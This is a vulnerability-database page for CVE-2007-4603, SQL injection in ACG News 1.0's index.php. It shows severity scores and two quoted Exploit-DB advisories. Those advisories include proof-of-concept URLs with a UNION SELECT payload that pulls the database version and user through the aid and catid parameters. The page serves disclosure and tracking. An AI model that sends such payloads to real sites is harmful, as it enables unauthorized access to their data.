CVE-2007-4603
published 2007-08-31CVE-2007-4603: Multiple SQL injection vulnerabilities in index.php in ACG News 1.0 allow remote attackers to execute arbitrary SQL commands via (1) the aid parameter in a…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.24%
65.4th percentile
Multiple SQL injection vulnerabilities in index.php in ACG News 1.0 allow remote attackers to execute arbitrary SQL commands via (1) the aid parameter in a showarticle action or (2) the catid parameter in a showcat action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| altercoder | acg_news | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ACG News 1.0 - 'aid'/'catid' SQL Injection
exploitdb·2007-08-28
CVE-2007-4603 ACG News 1.0 - 'aid'/'catid' SQL Injection
ACG News 1.0 - 'aid'/'catid' SQL Injection
---
ACG News SQL Injection
Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection
Original Advisory:
http://14house.blogspot.com/2007/08/acg-news-sql-injection.html
Discovered by: David Sopas Ferreira a.k.a SmOk3
SQL Injection
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variables are $aid and $catid
on index.php file.
Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 U
Exploit-DB
ACG News 1.0 - 'index.php' Multiple SQL Injections
exploitdb·2007-08-28
CVE-2007-4603 ACG News 1.0 - 'index.php' Multiple SQL Injections
ACG News 1.0 - 'index.php' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/25466/info
ACG News is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect ACG News 1.0; other versions may also be vulnerable.
http://www.example.com/index.php?menu=showarticle&aid=[SQL INJECTION]
http://www.example.com/index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
http://www.example.com/index.php?menu=showcat&catid=[SQL INJECTION]
http://www.example.com/index.php?menu=showcat&catid=-3 U
No writeups or analysis indexed.
http://14house.blogspot.com/2007/08/acg-news-sql-injection.htmlhttp://secunia.com/advisories/26637http://www.osvdb.org/36690http://www.osvdb.org/36691http://www.securityfocus.com/bid/25466https://exchange.xforce.ibmcloud.com/vulnerabilities/36293https://www.exploit-db.com/exploits/4330http://14house.blogspot.com/2007/08/acg-news-sql-injection.htmlhttp://secunia.com/advisories/26637http://www.osvdb.org/36690http://www.osvdb.org/36691http://www.securityfocus.com/bid/25466https://exchange.xforce.ibmcloud.com/vulnerabilities/36293https://www.exploit-db.com/exploits/4330
2007-08-31
Published